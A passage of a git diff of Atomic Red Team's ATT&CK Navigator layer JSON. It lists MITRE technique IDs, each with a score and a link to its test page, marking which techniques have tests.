"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 1530a1d7..6795fd26 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/m